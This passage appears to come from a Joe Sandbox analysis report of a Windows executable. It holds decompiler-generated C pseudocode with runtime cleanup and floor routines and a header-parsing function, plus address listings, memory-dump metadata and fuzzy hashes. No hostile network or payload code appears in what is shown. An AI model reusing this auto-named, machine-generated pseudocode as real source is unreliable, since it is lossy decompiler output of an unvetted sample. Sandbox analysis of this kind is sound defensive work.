                                                    								__eflags = _t1235 -  *0xd22274; // 0x200
                                                    								if(__eflags == 0) {
                                                    									break;
                                                    								}
                                                    								_t763 =  *0xd22278; // 0x0
                                                    								_t764 =  *(_t763 + _t1235 * 4);
                                                    								__eflags = _t764;
                                                    								if(_t764 != 0) {
                                                    									__eflags =  *(_t764 + 0xc) >> 0x0000000d & 0x00000001;
                                                    									if(__eflags != 0) {
                                                    										_t773 =  *0xd22278; // 0x0
                                                    										_push( *((intOrPtr*)(_t773 + _t1235 * 4)));
                                                    										_t774 = E00CF0023(_t1055, _t1071, _t1142, _t1186, _t1235, __eflags);
                                                    										__eflags = _t774 - 0xffffffff;
                                                    										if(_t774 != 0xffffffff) {
                                                    											_t731 =  &_v32;
                                                    											 *_t731 = _v32 + 1;
                                                    											__eflags =  *_t731;
                                                    										}
                                                    									}
                                                    									_t767 =  *0xd22278; // 0x0
                                                    									DeleteCriticalSection( *((intOrPtr*)(_t767 + _t1235 * 4)) + 0x20);
                                                    									_t770 =  *0xd22278; // 0x0
                                                    									E00CE8DCC( *((intOrPtr*)(_t770 + _t1235 * 4)));
                                                    									_pop(_t1071);
                                                    									_t772 =  *0xd22278; // 0x0
                                                    									_t737 = _t772 + _t1235 * 4;
                                                    									 *_t737 =  *(_t772 + _t1235 * 4) & 0x00000000;
                                                    									__eflags =  *_t737;
                                                    								}
                                                    								_t1235 = _t1235 + 1;
                                                    							}
                                                    							_v8 = 0xfffffffe;
                                                    							E00CEED21();
                                                    							return E00CDF640(_v32);
                                                    						} else {
                                                    							L309:
                                                    							_t1284 = _v1936;
                                                    							_pop(_t1187);
                                                    							_pop(_t1236);
                                                    							_pop(_t1056);
                                                    							if(_v1936 != 0) {
                                                    								_t755 = E00CEF381(_t1070, _t1284,  &_v1944);
                                                    							}
                                                    							return E00CDFBBC(_t755, _t1056, _v8 ^ _t1271, _t1142, _t1187, _t1236);
                                                    						}
                                                    					}
                                                    				}
                                                    			}

                                                    0x00ced9bb
                                                    0x00ced9c3
                                                    0x00ced9c6
                                                    0x00ced9c9
                                                    0x00ced9cc
                                                    0x00ced9d2
                                                    0x00ced9da
                                                    0x00ced9e0
                                                    0x00ced9ea
                                                    0x00ced9ea
                                                    0x00ced9ed
                                                    0x00ced9f5
                                                    0x00ced9fc
                                                    0x00ced9fc
                                                    0x00ced9ef
                                                    0x00ced9ef
                                                    0x00ced9f1
                                                    0x00ceda04
                                                    0x00ceda0a
                                                    0x00ceda0c
                                                    0x00ceda10
                                                    0x00ceda15
                                                    0x00ceda22
                                                    0x00ceda24
                                                    0x00ceda2a
                                                    0x00ceda2f
                                                    0x00ceda31
                                                    0x00ceda34
                                                    0x00ceda3a
                                                    0x00ceda3b
                                                    0x00ceda40
                                                    0x00ceda46
                                                    0x00ceda4b
                                                    0x00ceda54
                                                    0x00ceda54
                                                    0x00ceda56
                                                    0x00ceda4d
                                                    0x00ceda4d
                                                    0x00ceda52
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceda52
                                                    0x00ceda5c
                                                    0x00ceda64
                                                    0x00ceda66
                                                    0x00ceda6f
                                                    0x00ceda70
                                                    0x00ceda76
                                                    0x00ceda78
                                                    0x00cede6b
                                                    0x00cede71
                                                    0x00cedf90
                                                    0x00cedf90
                                                    0x00cedf97
                                                    0x00cedf97
                                                    0x00cedf97
                                                    0x00cedf9e
                                                    0x00cedfa1
                                                    0x00cedfa8
                                                    0x00cedfa8
                                                    0x00cedfa3
                                                    0x00cedfa3
                                                    0x00cedfa3
                                                    0x00cedfac
                                                    0x00cedfad
                                                    0x00cedfaf
                                                    0x00cedfb2
                                                    0x00cedfb5
                                                    0x00cedfb8
                                                    0x00cedfbe
                                                    0x00cedfc1
                                                    0x00cedfc4
                                                    0x00cedfce
                                                    0x00cedfce
                                                    0x00cedfce
                                                    0x00cedfc6
                                                    0x00cedfc6
                                                    0x00cedfc8
                                                    0x00000000
                                                    0x00cedfca
                                                    0x00cedfca
                                                    0x00cedfca
                                                    0x00cedfc8
                                                    0x00cedfd0
                                                    0x00cedfd2
                                                    0x00cee073
                                                    0x00cee073
                                                    0x00cee080
                                                    0x00cee080
                                                    0x00cee080
                                                    0x00cee096
                                                    0x00cee09b
                                                    0x00cedfd8
                                                    0x00cedfd8
                                                    0x00cedfda
                                                    0x00000000
                                                    0x00cedfe0
                                                    0x00cedfe2
                                                    0x00cedfe3
                                                    0x00cedfe5
                                                    0x00cedfe7
                                                    0x00cedfe7
                                                    0x00cedfe9
                                                    0x00cedfec
                                                    0x00cedff4
                                                    0x00cedff6
                                                    0x00cedff9
                                                    0x00cedfff
                                                    0x00cedfff
                                                    0x00cee001
                                                    0x00cee00d
                                                    0x00cee00d
                                                    0x00cee00d
                                                    0x00cee003
                                                    0x00cee005
                                                    0x00cee005
                                                    0x00cee014
                                                    0x00cee017
                                                    0x00cee019
                                                    0x00cee020
                                                    0x00cee020
                                                    0x00cee01b
                                                    0x00cee01b
                                                    0x00cee01b
                                                    0x00cee028
                                                    0x00cee032
                                                    0x00cee038
                                                    0x00cee039
                                                    0x00cee03e
                                                    0x00cee044
                                                    0x00cee047
                                                    0x00000000
                                                    0x00000000
                                                    0x00cee049
                                                    0x00cee049
                                                    0x00cee051
                                                    0x00cee051
                                                    0x00cee057
                                                    0x00cee05e
                                                    0x00cee06b
                                                    0x00cee060
                                                    0x00cee060
                                                    0x00cee063
                                                    0x00cee063
                                                    0x00cee05e
                                                    0x00cedfda
                                                    0x00cee0a7
                                                    0x00cee0b7
                                                    0x00cee0c4
                                                    0x00cee0c6
                                                    0x00cee0cd
                                                    0x00cede77
                                                    0x00cede77
                                                    0x00cede80
                                                    0x00cede81
                                                    0x00cede8b
                                                    0x00cede91
                                                    0x00cede93
                                                    0x00cede99
                                                    0x00cede99
                                                    0x00cede9b
                                                    0x00cede9b
                                                    0x00cedea2
                                                    0x00cedea9
                                                    0x00000000
                                                    0x00000000
                                                    0x00cedeaf
                                                    0x00cedeb2
                                                    0x00cedeb5
                                                    0x00000000
                                                    0x00cedeb7
                                                    0x00cedeb7
                                                    0x00cedeb7
                                                    0x00cedeb7
                                                    0x00cedebe
                                                    0x00cedec1
                                                    0x00cedec8
                                                    0x00cedec8
                                                    0x00cedec3
                                                    0x00cedec3
                                                    0x00cedec3
                                                    0x00cedecc
                                                    0x00cedecf
                                                    0x00ceded1
                                                    0x00ceded3
                                                    0x00ceded9
                                                    0x00cededf
                                                    0x00cedee1
                                                    0x00cedee1
                                                    0x00cedee1
                                                    0x00cedee8
                                                    0x00cedee8
                                                    0x00cedeea
                                                    0x00cedef6
                                                    0x00cedef6
                                                    0x00cedef6
                                                    0x00cedeec
                                                    0x00cedeee
                                                    0x00cedeee
                                                    0x00cedefd
                                                    0x00cedf00
                                                    0x00cedf02
                                                    0x00cedf09
                                                    0x00cedf09
                                                    0x00cedf04
                                                    0x00cedf04
                                                    0x00cedf04
                                                    0x00cedf11
                                                    0x00cedf1c
                                                    0x00cedf22
                                                    0x00cedf23
                                                    0x00cedf28
                                                    0x00cedf2e
                                                    0x00cedf31
                                                    0x00000000
                                                    0x00000000
                                                    0x00cedf33
                                                    0x00cedf33
                                                    0x00cedf3d
                                                    0x00cedf48
                                                    0x00cedf50
                                                    0x00cedf56
                                                    0x00cedf61
                                                    0x00cedf67
                                                    0x00cedf6e
                                                    0x00cedf81
                                                    0x00cedf88
                                                    0x00cedf88
                                                    0x00000000
                                                    0x00cedeb5
                                                    0x00cede9b
                                                    0x00000000
                                                    0x00cede93
                                                    0x00cee0d0
                                                    0x00cee0d0
                                                    0x00cee0d6
                                                    0x00cee0db
                                                    0x00cee0e1
                                                    0x00cee0f4
                                                    0x00cee0f9
                                                    0x00ceda7e
                                                    0x00ceda7e
                                                    0x00ceda87
                                                    0x00ceda88
                                                    0x00ceda92
                                                    0x00ceda98
                                                    0x00ceda9a
                                                    0x00cedca0
                                                    0x00cedca8
                                                    0x00cedcab
                                                    0x00cedcb0
                                                    0x00cedcb3
                                                    0x00cedcbb
                                                    0x00cedcbf
                                                    0x00cedcc5
                                                    0x00cedccb
                                                    0x00cedcd0
                                                    0x00cedcd7
                                                    0x00cedcd8
                                                    0x00cedcd8
                                                    0x00cedcd8
                                                    0x00cedcdf
                                                    0x00cedce2
                                                    0x00cedcea
                                                    0x00cedcf0
                                                    0x00cedcf5
                                                    0x00cedcf5
                                                    0x00cedcf2
                                                    0x00cedcf2
                                                    0x00cedcf2
                                                    0x00cedcf9
                                                    0x00cedcfa
                                                    0x00cedcfc
                                                    0x00cedcff
                                                    0x00cedd05
                                                    0x00cedd0b
                                                    0x00cedd0e
                                                    0x00cedd11
                                                    0x00cedd17
                                                    0x00cedd1a
                                                    0x00cedd1d
                                                    0x00cedd27
                                                    0x00cedd27
                                                    0x00cedd27
                                                    0x00cedd1f
                                                    0x00cedd1f
                                                    0x00cedd21
                                                    0x00000000
                                                    0x00cedd23
                                                    0x00cedd23
                                                    0x00cedd23
                                                    0x00cedd21
                                                    0x00cedd29
                                                    0x00cedd2b
                                                    0x00cede1d
                                                    0x00cede1d
                                                    0x00cede1f
                                                    0x00cede25
                                                    0x00cede2b
                                                    0x00cede40
                                                    0x00cede45
                                                    0x00cedd31
                                                    0x00cedd31
                                                    0x00cedd33
                                                    0x00000000
                                                    0x00cedd39
                                                    0x00cedd3b
                                                    0x00cedd3c
                                                    0x00cedd3e
                                                    0x00cedd40
                                                    0x00cedd42
                                                    0x00cedd42
                                                    0x00cedd48
                                                    0x00cedd4a
                                                    0x00cedd50
                                                    0x00cedd53
                                                    0x00cedd61
                                                    0x00cedd67
                                                    0x00cedd67
                                                    0x00cedd69
                                                    0x00cedd6c
                                                    0x00cedd72
                                                    0x00cedd72
                                                    0x00cedd74
                                                    0x00000000
                                                    0x00000000
                                                    0x00cedd76
                                                    0x00cedd78
                                                    0x00cedd7e
                                                    0x00cedd7e
                                                    0x00cedd7a
                                                    0x00cedd7a
                                                    0x00cedd7a
                                                    0x00cedd83
                                                    0x00cedd85
                                                    0x00cedd8c
                                                    0x00cedd8c
                                                    0x00cedd87
                                                    0x00cedd87
                                                    0x00cedd87
                                                    0x00ceddb2
                                                    0x00ceddb8
                                                    0x00ceddbb
                                                    0x00ceddc1
                                                    0x00ceddc8
                                                    0x00ceddc9
                                                    0x00ceddca
                                                    0x00ceddd0
                                                    0x00ceddd3
                                                    0x00ceddd5
                                                    0x00000000
                                                    0x00ceddd5
                                                    0x00000000
                                                    0x00ceddd3
                                                    0x00cedddd
                                                    0x00cedde3
                                                    0x00ceddeb
                                                    0x00ceddeb
                                                    0x00ceddec
                                                    0x00ceddee
                                                    0x00ceddf2
                                                    0x00ceddfa
                                                    0x00ceddfa
                                                    0x00ceddfa
                                                    0x00ceddfc
                                                    0x00cede03
                                                    0x00cede08
                                                    0x00cede15
                                                    0x00cede0a
                                                    0x00cede0d
                                                    0x00cede0d
                                                    0x00cede08
                                                    0x00cedd33
                                                    0x00cede48
                                                    0x00cede52
                                                    0x00cede58
                                                    0x00cede5e
                                                    0x00cede64
                                                    0x00cedaa0
                                                    0x00cedaa0
                                                    0x00cedaa0
                                                    0x00cedaa2
                                                    0x00cedaa9
                                                    0x00cedab0
                                                    0x00000000
                                                    0x00000000
                                                    0x00cedab6
                                                    0x00cedab9
                                                    0x00cedabc
                                                    0x00000000
                                                    0x00cedabe
                                                    0x00cedac6
                                                    0x00cedacb
                                                    0x00cedad0
                                                    0x00cedad1
                                                    0x00cedad3
                                                    0x00cedadb
                                                    0x00cedadf
                                                    0x00cedae5
                                                    0x00cedaeb
                                                    0x00cedaf0
                                                    0x00cedaf7
                                                    0x00cedaf7
                                                    0x00cedaf8
                                                    0x00cedafb
                                                    0x00cedb03
                                                    0x00cedb09
                                                    0x00cedb0e
                                                    0x00cedb0e
                                                    0x00cedb0b
                                                    0x00cedb0b
                                                    0x00cedb0b
                                                    0x00cedb12
                                                    0x00cedb13
                                                    0x00cedb15
                                                    0x00cedb18
                                                    0x00cedb1e
                                                    0x00cedb24
                                                    0x00cedb27
                                                    0x00cedb2a
                                                    0x00cedb30
                                                    0x00cedb33
                                                    0x00cedb36
                                                    0x00cedb40
                                                    0x00cedb40
                                                    0x00cedb40
                                                    0x00cedb38
                                                    0x00cedb38
                                                    0x00cedb3a
                                                    0x00000000
                                                    0x00cedb3c
                                                    0x00cedb3c
                                                    0x00cedb3c
                                                    0x00cedb3a
                                                    0x00cedb42
                                                    0x00cedb44
                                                    0x00cedc39
                                                    0x00cedc39
                                                    0x00cedc3b
                                                    0x00cedc41
                                                    0x00cedc47
                                                    0x00cedc5c
                                                    0x00cedc61
                                                    0x00cedb4a
                                                    0x00cee401
                                                    0x00cee401
                                                    0x00cee401
                                                    0x00cee403
                                                    0x00000000
                                                    0x00000000
                                                    0x00cee405
                                                    0x00cee408
                                                    0x00cee4c2
                                                    0x00cee4c2
                                                    0x00cee4c4
                                                    0x00cee4ca
                                                    0x00cee4d0
                                                    0x00cee4d1
                                                    0x00000000
                                                    0x00cee40e
                                                    0x00cee40e
                                                    0x00cee410
                                                    0x00cee412
                                                    0x00cee412
                                                    0x00cee412
                                                    0x00cee41a
                                                    0x00cee41d
                                                    0x00cee41d
                                                    0x00cee423
                                                    0x00cee425
                                                    0x00cee427
                                                    0x00cee42e
                                                    0x00cee434
                                                    0x00cee436
                                                    0x00000000
                                                    0x00cee436
                                                    0x00000000
                                                    0x00cee408
                                                    0x00000000
                                                    0x00cee401
                                                    0x00000000
                                                    0x00cee3a5
                                                    0x00cee368
                                                    0x00cee368
                                                    0x00cee36a
                                                    0x00cee370
                                                    0x00cee377
                                                    0x00cee377
                                                    0x00cee37a
                                                    0x00cee37a
                                                    0x00000000
                                                    0x00cee36a
                                                    0x00000000
                                                    0x00cee44e
                                                    0x00cee44e
                                                    0x00cee44f
                                                    0x00cee44f
                                                    0x00000000
                                                    0x00cee354
                                                    0x00cee22d
                                                    0x00cee22d
                                                    0x00cee23f
                                                    0x00cee24e
                                                    0x00cee253
                                                    0x00cee256
                                                    0x00cee258
                                                    0x00cee274
                                                    0x00cee277
                                                    0x00000000
                                                    0x00cee27d
                                                    0x00cee27d
                                                    0x00cee284
                                                    0x00000000
                                                    0x00cee28a
                                                    0x00cee290
                                                    0x00cee292
                                                    0x00cee298
                                                    0x00cee298
                                                    0x00cee29a
                                                    0x00cee29a
                                                    0x00cee29c
                                                    0x00cee2a5
                                                    0x00cee2ac
                                                    0x00cee2af
                                                    0x00cee2b0
                                                    0x00cee2b2
                                                    0x00cee2b2
                                                    0x00000000
                                                    0x00cee29a
                                                    0x00cee284
                                                    0x00cee25a
                                                    0x00cee25c
                                                    0x00cee262
                                                    0x00cee268
                                                    0x00cee269
                                                    0x00000000
                                                    0x00cee269
                                                    0x00cee258
                                                    0x00cee1a6
                                                    0x00cee1a6
                                                    0x00cee1ac
                                                    0x00cee1ae
                                                    0x00cee1c3
                                                    0x00cee1c6
                                                    0x00000000
                                                    0x00cee1cc
                                                    0x00cee1cc
                                                    0x00cee1d3
                                                    0x00000000
                                                    0x00cee1d9
                                                    0x00cee1df
                                                    0x00cee1e1
                                                    0x00cee1e7
                                                    0x00cee1e7
                                                    0x00cee1e9
                                                    0x00cee1e9
                                                    0x00cee1eb
                                                    0x00cee1f4
                                                    0x00cee1fb
                                                    0x00cee1fe
                                                    0x00cee1ff
                                                    0x00cee201
                                                    0x00cee201
                                                    0x00cee2ba
                                                    0x00cee2ba
                                                    0x00cee2bc
                                                    0x00000000
                                                    0x00cee2c2
                                                    0x00cee2c2
                                                    0x00cee2c8
                                                    0x00cee2cb
                                                    0x00cee20e
                                                    0x00cee215
                                                    0x00000000
                                                    0x00cee2d1
                                                    0x00cee2d3
                                                    0x00cee2d9
                                                    0x00cee2df
                                                    0x00cee2e0
                                                    0x00cee4d7
                                                    0x00cee4d7
                                                    0x00cee4de
                                                    0x00cee4df
                                                    0x00cee4e0
                                                    0x00cee4e5
                                                    0x00cee4e8
                                                    0x00cee4e8
                                                    0x00cee2cb
                                                    0x00cee2bc
                                                    0x00cee1d3
                                                    0x00cee1b0
                                                    0x00cee1b0
                                                    0x00cee1b2
                                                    0x00cee1b8
                                                    0x00cee462
                                                    0x00cee462
                                                    0x00cee463
                                                    0x00cee469
                                                    0x00cee469
                                                    0x00cee470
                                                    0x00cee471
                                                    0x00cee472
                                                    0x00cee477
                                                    0x00cee47a
                                                    0x00cee47a
                                                    0x00cee47a
                                                    0x00cee1ae
                                                    0x00cee47c
                                                    0x00cee47c
                                                    0x00cee47e
                                                    0x00cee4ec
                                                    0x00cee4f3
                                                    0x00cee4f3
                                                    0x00cee4f3
                                                    0x00cee4fa
                                                    0x00cee4fc
                                                    0x00cee502
                                                    0x00cee503
                                                    0x00cee9af
                                                    0x00cee9af
                                                    0x00cee9b0
                                                    0x00cee9b1
                                                    0x00cee9b6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cee480
                                                    0x00cee486
                                                    0x00cee486
                                                    0x00cee48c
                                                    0x00cee48c
                                                    0x00cee498
                                                    0x00000000
                                                    0x00cee498
                                                    0x00cee127
                                                    0x00cee9b9
                                                    0x00cee9b9
                                                    0x00cee9bf
                                                    0x00cee9c1
                                                    0x00cee9c7
                                                    0x00cee9cd
                                                    0x00cee9cf
                                                    0x00cee9d1
                                                    0x00cee9d3
                                                    0x00cee9d3
                                                    0x00cee9d5
                                                    0x00cee9d5
                                                    0x00cee9de
                                                    0x00cee9df
                                                    0x00cee9e3
                                                    0x00cee9ea
                                                    0x00cee9ed
                                                    0x00cee9ee
                                                    0x00cee9f0
                                                    0x00cee9f0
                                                    0x00cee9f4
                                                    0x00cee9fa
                                                    0x00cee9fc
                                                    0x00ceea02
                                                    0x00ceea04
                                                    0x00ceea0a
                                                    0x00ceea0d
                                                    0x00ceea20
                                                    0x00ceea23
                                                    0x00ceea29
                                                    0x00ceea3e
                                                    0x00ceea43
                                                    0x00ceea0f
                                                    0x00ceea11
                                                    0x00ceea18
                                                    0x00ceea18
                                                    0x00ceea0d
                                                    0x00ceea46
                                                    0x00ceea46
                                                    0x00ceea56
                                                    0x00ceea5f
                                                    0x00ceea60
                                                    0x00ceea62
                                                    0x00ceeaf9
                                                    0x00ceeafb
                                                    0x00ceeb06
                                                    0x00ceeb06
                                                    0x00ceeb08
                                                    0x00ceeb0b
                                                    0x00ceeb0d
                                                    0x00000000
                                                    0x00ceeafd
                                                    0x00ceeb03
                                                    0x00ceeb03
                                                    0x00ceea68
                                                    0x00ceea68
                                                    0x00ceea6e
                                                    0x00ceea71
                                                    0x00ceea77
                                                    0x00ceea7a
                                                    0x00ceea80
                                                    0x00ceea82
                                                    0x00ceea88
                                                    0x00ceea8a
                                                    0x00ceea8c
                                                    0x00ceea8c
                                                    0x00ceea8e
                                                    0x00ceea8e
                                                    0x00ceea9b
                                                    0x00ceeaa2
                                                    0x00ceeaa5
                                                    0x00ceeaa6
                                                    0x00ceeaa8
                                                    0x00ceeaa9
                                                    0x00ceeaa9
                                                    0x00ceeaad
                                                    0x00ceeab3
                                                    0x00ceeab5
                                                    0x00ceeab7
                                                    0x00ceeabd
                                                    0x00ceeac0
                                                    0x00ceead4
                                                    0x00ceeada
                                                    0x00ceeaef
                                                    0x00ceeaf4
                                                    0x00ceeac2
                                                    0x00ceeac2
                                                    0x00ceeac9
                                                    0x00ceeac9
                                                    0x00ceeac0
                                                    0x00ceeab5
                                                    0x00ceeb13
                                                    0x00ceeb13
                                                    0x00ceeb13
                                                    0x00ceeb1f
                                                    0x00ceeb22
                                                    0x00ceeb28
                                                    0x00ceeb2a
                                                    0x00ceeb2c
                                                    0x00ceeb32
                                                    0x00ceeb34
                                                    0x00ceeb34
                                                    0x00ceeb34
                                                    0x00ceeb32
                                                    0x00ceeb39
                                                    0x00ceeb3a
                                                    0x00ceeb3c
                                                    0x00ceeb3e
                                                    0x00ceeb3e
                                                    0x00ceeb40
                                                    0x00ceeb46
                                                    0x00ceeb4c
                                                    0x00ceeb4e
                                                    0x00ceeb54
                                                    0x00ceeb54
                                                    0x00ceeb5a
                                                    0x00ceeb5c
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceeb62
                                                    0x00ceeb64
                                                    0x00ceeb66
                                                    0x00ceeb66
                                                    0x00ceeb68
                                                    0x00ceeb68
                                                    0x00ceeb78
                                                    0x00ceeb7f
                                                    0x00ceeb82
                                                    0x00ceeb83
                                                    0x00ceeb85
                                                    0x00ceeb85
                                                    0x00ceeb89
                                                    0x00ceeb8f
                                                    0x00ceeb91
                                                    0x00ceeb93
                                                    0x00ceeb99
                                                    0x00ceeb9c
                                                    0x00ceebad
                                                    0x00ceebb0
                                                    0x00ceebb6
                                                    0x00ceebcb
                                                    0x00ceebd0
                                                    0x00ceeb9e
                                                    0x00ceeb9e
                                                    0x00ceeba5
                                                    0x00ceeba5
                                                    0x00ceeb9c
                                                    0x00ceebe1
                                                    0x00ceebf0
                                                    0x00ceebf1
                                                    0x00ceebf1
                                                    0x00ceebf3
                                                    0x00ceebf5
                                                    0x00ceebf5
                                                    0x00ceebfb
                                                    0x00ceebfe
                                                    0x00ceec00
                                                    0x00ceec02
                                                    0x00ceec02
                                                    0x00ceec05
                                                    0x00ceec06
                                                    0x00ceec06
                                                    0x00ceec0b
                                                    0x00ceec0e
                                                    0x00ceec12
                                                    0x00ceec12
                                                    0x00ceec13
                                                    0x00ceec15
                                                    0x00ceec1b
                                                    0x00ceec21
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceec21
                                                    0x00ceeb54
                                                    0x00ceec27
                                                    0x00ceec27
                                                    0x00000000
                                                    0x00ceec27
                                                    0x00ced9ac
                                                    0x00ced9a3
                                                    0x00ced99a
                                                    0x00ced951
                                                    0x00ced955
                                                    0x00ced95d
                                                    0x00000000
                                                    0x00ced95f
                                                    0x00ced965
                                                    0x00ced96a
                                                    0x00ceec46
                                                    0x00ceec46
                                                    0x00ceec49
                                                    0x00ceec54
                                                    0x00ceec7f
                                                    0x00ceec80
                                                    0x00ceec81
                                                    0x00ceec82
                                                    0x00ceec83
                                                    0x00ceec84
                                                    0x00ceec89
                                                    0x00ceec8a
                                                    0x00ceec91
                                                    0x00ceec96
                                                    0x00ceec9c
                                                    0x00ceeca1
                                                    0x00ceeca2
                                                    0x00ceeca2
                                                    0x00ceeca2
                                                    0x00ceeca8
                                                    0x00ceeca9
                                                    0x00ceeca9
                                                    0x00ceecac
                                                    0x00ceecb2
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceecb4
                                                    0x00ceecb9
                                                    0x00ceecbc
                                                    0x00ceecbe
                                                    0x00ceecc6
                                                    0x00ceecc8
                                                    0x00ceecca
                                                    0x00ceeccf
                                                    0x00ceecd2
                                                    0x00ceecd8
                                                    0x00ceecdb
                                                    0x00ceecdd
                                                    0x00ceecdd
                                                    0x00ceecdd
                                                    0x00ceecdd
                                                    0x00ceecdb
                                                    0x00ceece0
                                                    0x00ceecec
                                                    0x00ceecf2
                                                    0x00ceecfa
                                                    0x00ceecff
                                                    0x00ceed00
                                                    0x00ceed05
                                                    0x00ceed05
                                                    0x00ceed05
                                                    0x00ceed05
                                                    0x00ceed09
                                                    0x00ceed09
                                                    0x00ceed0c
                                                    0x00ceed13
                                                    0x00ceed20
                                                    0x00ceec56
                                                    0x00ceec56
                                                    0x00ceec56
                                                    0x00ceec5d
                                                    0x00ceec5e
                                                    0x00ceec5f
                                                    0x00ceec60
                                                    0x00ceec69
                                                    0x00ceec6e
                                                    0x00ceec7c
                                                    0x00ceec7c
                                                    0x00ceec54
                                                    0x00ced95d

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: __floor_pentium4
                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                    • API String ID: 4168288129-2761157908
                                                    • Opcode ID: b269815ada3de57b6cfbccba0419be46c986456eeae32ea18159d8e25861effd
                                                    • Instruction ID: d7b4d547dd0cb42a2ab54b640686fe24ef419c251bc29d0d9245466d2fbaa64b
                                                    • Opcode Fuzzy Hash: b269815ada3de57b6cfbccba0419be46c986456eeae32ea18159d8e25861effd
                                                    • Instruction Fuzzy Hash: B4C26C72E086688FDB25CF2ADD407EAB7B5EB44344F1541EAD45EE7280E774AE818F40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 59%
                                                    			E00CC32F7(intOrPtr* __ecx, void* __eflags) {
                                                    				void* __ebp;
                                                    				void* _t237;
                                                    				signed int _t240;
                                                    				void* _t246;
                                                    				unsigned int _t248;
                                                    				unsigned int _t252;
                                                    				void* _t253;
                                                    				signed int _t257;
                                                    				char _t269;
                                                    				signed int _t277;
                                                    				signed int _t289;
                                                    				unsigned int _t290;
                                                    				intOrPtr _t291;
                                                    				signed int _t292;
                                                    				signed int _t295;
                                                    				char _t302;
                                                    				signed char _t304;
                                                    				signed int _t319;
                                                    				signed int _t328;
                                                    				signed int _t329;
                                                    				signed int _t331;
                                                    				signed int _t335;
                                                    				signed int _t350;
                                                    				signed char _t352;
                                                    				unsigned int _t363;
                                                    				intOrPtr _t370;
                                                    				void* _t373;
                                                    				intOrPtr _t374;
                                                    				void* _t381;
                                                    				signed int _t383;
                                                    				void* _t384;
                                                    				signed int _t395;
                                                    				intOrPtr* _t399;
                                                    				signed int _t414;
                                                    				signed int _t423;
                                                    				char _t432;
                                                    				signed int _t433;
                                                    				signed int _t438;
                                                    				signed int _t442;
                                                    				intOrPtr _t450;
                                                    				unsigned int _t456;
                                                    				unsigned int _t459;
                                                    				signed int _t463;
                                                    				signed int _t471;
                                                    				signed int _t480;
                                                    				signed int _t485;
                                                    				signed int _t500;
                                                    				signed int _t502;
                                                    				signed char _t503;
                                                    				signed int _t504;
                                                    				unsigned int _t505;
                                                    				intOrPtr _t514;
                                                    				void* _t515;
                                                    				void* _t522;
                                                    				signed int _t525;
                                                    				void* _t526;
                                                    				signed int _t536;
                                                    				void* _t542;
                                                    				void* _t544;
                                                    				intOrPtr _t547;
                                                    				void* _t548;
                                                    				void* _t550;
                                                    				void* _t551;
                                                    				intOrPtr _t561;
                                                    
                                                    				_t551 = _t550 - 0x68;
                                                    				E00CDEB78(0xcf26be, _t548);
                                                    				E00CDEC50(0x2068);
                                                    				_t399 = __ecx;
                                                    				E00CCCB83(_t548 + 0x30, __ecx);
                                                    				 *(_t548 + 0x64) = 0;
                                                    				 *((intOrPtr*)(_t548 - 4)) = 0;
                                                    				if( *((intOrPtr*)(__ecx + 0x6cd4)) == 0) {
                                                    					L18:
                                                    					 *((char*)(_t548 + 0x6a)) = 0;
                                                    					L19:
                                                    					_push(7);
                                                    					_t237 = E00CCCD8A();
                                                    					__eflags = _t237 - 7;
                                                    					if(_t237 >= 7) {
                                                    						 *(_t399 + 0x220c) = 0;
                                                    						 *(_t399 + 0x21fc) = E00CCCBFB(_t548 + 0x30);
                                                    						_t536 = E00CCCD66(_t548 + 0x30, 4);
                                                    						_t240 = E00CCCCFB();
                                                    						__eflags = _t240 | _t500;
                                                    						if((_t240 | _t500) == 0) {
                                                    							L88:
                                                    							E00CC20D7(_t399);
                                                    							L89:
                                                    							E00CC15FB(_t548 + 0x30);
                                                    							 *[fs:0x0] =  *((intOrPtr*)(_t548 - 0xc));
                                                    							return  *(_t548 + 0x64);
                                                    						}
                                                    						__eflags = _t536;
                                                    						if(_t536 == 0) {
                                                    							goto L88;
                                                    						}
                                                    						_t46 = _t536 + 4; // 0x4
                                                    						_t47 = _t536 - 3; // -3
                                                    						_t514 = _t46 + _t240;
                                                    						_t414 = _t47 + _t240;
                                                    						__eflags = _t414;
                                                    						if(_t414 < 0) {
                                                    							goto L88;
                                                    						}
                                                    						__eflags = _t514 - 7;
                                                    						if(_t514 < 7) {
                                                    							goto L88;
                                                    						}
                                                    						_push(_t414);
                                                    						E00CCCD8A();
                                                    						__eflags =  *(_t548 + 0x48) - _t514;
                                                    						if( *(_t548 + 0x48) < _t514) {
                                                    							goto L20;
                                                    						}
                                                    						_t246 = E00CCCCDB(_t548 + 0x30);
                                                    						 *(_t399 + 0x2200) = E00CCCCFB();
                                                    						_t248 = E00CCCCFB();
                                                    						 *(_t399 + 0x2204) = _t248;
                                                    						 *((intOrPtr*)(_t399 + 0x2208)) = _t514;
                                                    						_t515 = _t399 + 0x21fc;
                                                    						 *(_t399 + 0x220c) = _t248 >> 0x00000002 & 0x00000001;
                                                    						__eflags =  *_t515 - _t246;
                                                    						 *(_t399 + 0x21f4) =  *(_t399 + 0x2200);
                                                    						_t60 = _t548 + 0x6b;
                                                    						 *_t60 =  *_t515 != _t246;
                                                    						__eflags =  *_t60;
                                                    						if( *_t60 == 0) {
                                                    							L29:
                                                    							_t252 = 0;
                                                    							__eflags =  *(_t399 + 0x2204) & 0x00000001;
                                                    							 *(_t548 + 0x58) = 0;
